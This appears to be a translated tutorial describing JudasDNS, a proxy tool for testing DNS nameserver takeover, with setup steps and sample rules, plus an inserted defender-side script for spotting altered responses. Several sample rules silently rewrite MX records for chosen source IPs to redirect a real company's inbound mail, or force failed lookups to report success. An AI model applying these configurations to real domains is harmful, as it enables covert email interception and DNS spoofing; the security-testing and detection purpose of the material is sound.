2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail what the JudasDNS tool is. The editor finds it very practical and shares it here as a reference; I hope you get something out of it.
JudasDNS is a security testing tool for DNS name servers. With JudasDNS, security researchers can test a target name server against DNS poisoning attacks to verify the security of that name server.
JudasDNS helps researchers build and deploy a DNS proxy server that stands in for a name server that has been taken over, in order to carry out targeted attacks. JudasDNS proxies all DNS queries to the legitimate name servers of a domain. Its rule configuration allows the DNS response to be modified according to the source IP or the DNS query type, which means an attacker can configure a malicious name server to selectively reroute inbound email from a specified source IP address range (through modified MX records), set very long TTLs, or perform attacks such as DNS cache poisoning.
Tool download
Run the following command to clone the project source code to your local machine:
git clone https://github.com/mandatoryprogrammer/JudasDNS.git
How to use JudasDNS
The following is a sample JudasDNS configuration for an example scenario in which an authoritative name server for Apple's domain (apple.com) has been acquired or taken over:
{
  "version": "1.0.0",
  "port": 2248,
  "dns_query_timeout": 10000,
  "target_nameservers": ["17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152"],
  "rules": [
    {
      "name": "Secretly redirect all emails coming from 127.0.0.1!",
      "query_type_matches": ["MX"],
      "ip_range_matches": ["127.0.0.1/32"],
      "modifications": [
        {"answer": [{"name": "apple.com", "type": 15, "class": 1, "ttl": 10, "priority": 10, "exchange": "hacktheplace.localhost"}]}
      ]
    },
    {
      "name": "Make all responses NOERROR even if they've failed.",
      "query_type_matches": ["*"],
      "modifications": [{"header": {"rcode": 0}}]
    }
  ]
}
Configuration parameter descriptions
1. version: configuration file format version (currently 1.0.0)
2. port: the port Judas runs on
3. dns_query_timeout: how long to wait (in milliseconds) before giving up on a reply from the upstream target name server
4. target_nameservers: the legitimate name servers of the target domain; Judas sends all DNS queries to them on behalf of the requesting clients
5. rules: list of rules that modify the DNS response
6. name: the name of a given rule
7. query_type_matches: a list of query types to match, such as CNAME, A, etc. The * wildcard matches any query type
8. ip_range_matches: a list of IP ranges to match, used to selectively spoof responses for a specific range of IPs
9. modifications: see the "Modifications" section of the README
Modifications
JudasDNS rules carry a modifications specification, which describes what changes are made to the DNS response before it is sent back to the client. Before modifying the response content, read the node-dns documentation to understand the DNS response structure.
Here is a sample of the DNS response format:
{
  header: { id: 25373, qr: 1, opcode: 0, aa: 1, tc: 0, rd: 1, ra: 0, res1: 0, res2: 0, res3: 0, rcode: 5 },
  question: [ { name: 'apple.com', type: 2, class: 1 } ],
  answer: [
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver2.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver4.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver3.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver5.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'nserver6.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'adns2.apple.com' },
    { name: 'apple.com', type: 2, class: 1, ttl: 86400, data: 'adns1.apple.com' }
  ],
  authority: [],
  additional: [],
  edns_options: [],
  payload: undefined,
  address: undefined,
  ...trimmed for brevity...
Note: for more information about the DNS response data structure, you can check out [this document].
Writing a modifications rule is very simple. Here is a sample rule:
{"name": "Make all responses NOERROR even if they've failed.", "query_type_matches": ["*"], "modifications": [{"header": {"rcode": 0}}]}
The above rule matches any query type and sets the header.rcode value in the DNS response to 0.
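A defender-side check for the two response changes configured above (a rewritten MX answer for selected source ranges and an rcode forced to 0), added here as an example and not part of JudasDNS or the original article: it diffs responses, in the structure shown above, against a known-good baseline collected from several vantage points. The function names, vantage labels and example.test records are constructed assumptions.

```javascript
// Added example (not JudasDNS code); responses use header.rcode plus answer[] as shown above.

// Identify a record by owner name, type and value; MX (type 15) carries its
// value in priority/exchange, the other types shown on this page in data.
function recordKey(rr) {
  const value = rr.type === 15 ? `${rr.priority} ${rr.exchange}` : String(rr.data || rr.address);
  return [rr.name, rr.type, value].join('|').toLowerCase();
}

// Compare one observed authoritative response with the known-good baseline.
function diffResponse(baseline, observed) {
  const findings = [];
  if (baseline.header.rcode !== observed.header.rcode) {
    findings.push({ kind: 'rcode-mismatch', expected: baseline.header.rcode, got: observed.header.rcode });
  }
  const expected = new Map(baseline.answer.map((rr) => [recordKey(rr), rr]));
  const seen = new Set();
  for (const rr of observed.answer) {
    const key = recordKey(rr);
    seen.add(key);
    const ref = expected.get(key);
    if (!ref) findings.push({ kind: 'unexpected-record', record: key, ttl: rr.ttl });
    else if (ref.ttl !== rr.ttl) findings.push({ kind: 'ttl-mismatch', record: key, expected: ref.ttl, got: rr.ttl });
  }
  for (const key of expected.keys()) {
    if (!seen.has(key)) findings.push({ kind: 'missing-record', record: key });
  }
  return findings;
}

// Rules can key on the requester's IP, so the same query is repeated from
// several source networks; only vantage points that deviate are returned.
function auditVantages(baseline, observations) {
  return observations
    .map((o) => ({ vantage: o.vantage, findings: diffResponse(baseline, o.response) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample data (hypothetical zone example.test).
const mx = (exchange, ttl) => ({ name: 'example.test', type: 15, class: 1, ttl, priority: 10, exchange });
const BASELINE_MX = { header: { rcode: 0 }, answer: [mx('mail.example.test', 3600)] };
const OBSERVED_MX = [
  { vantage: 'office-network', response: { header: { rcode: 0 }, answer: [mx('mail.example.test', 3600)] } },
  { vantage: 'partner-network', response: { header: { rcode: 0 }, answer: [mx('relay.invalid', 10)] } },
];
const BASELINE_NX = { header: { rcode: 3 }, answer: [] }; // 3 = NXDOMAIN
const OBSERVED_NX = { header: { rcode: 0 }, answer: [] }; // forced to NOERROR
console.log(JSON.stringify(auditVantages(BASELINE_MX, OBSERVED_MX), null, 2));
```

The TTL comparison assumes each response was collected by querying the authoritative server directly, since answers served from a caching resolver count down.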
Here is another sample rule for your reference:
{"name": "Secretly redirect all emails coming from 127.0.0.1!", "query_type_matches": ["MX"], "ip_range_matches": ["127.0.0.1/32"], "modifications": [{"answer": [{"name": "apple.com", "type": 15, "class": 1, "ttl": 10, "priority": 10, "exchange": "hacktheplace.localhost"}]}]}
Rule matching types
Requester IP
The following rule matches the IP address of a client:
{"name": "Make all responses requested from localhost (127.0.0.1) NOERROR.", "ip_range_matches": ["127.0.0.1/32"], "modifications": [{"header": {"rcode": 0}}]}
Request query type
The following rule matches the query types MX and CNAME and applies the corresponding modifications:
{"name": "Make all responses NOERROR even if they've failed.", "query_type_matches": ["MX", "CNAME"], "modifications": [{"header": {"rcode": 0}}]}
Response status code
The following rule matches the NXDOMAIN response code and applies the corresponding modifications:
{"name": "Make all responses requested from localhost (127.0.0.1) NOERROR.", "response_code_matches": ["NXDOMAIN"], "modifications": [{"header": {"rcode": 0}}]}
This is the end of the article on "what is JudasDNS". I hope the above content is of some help to you and that you can learn more from it. If you think the article is good, please share it for more people to see.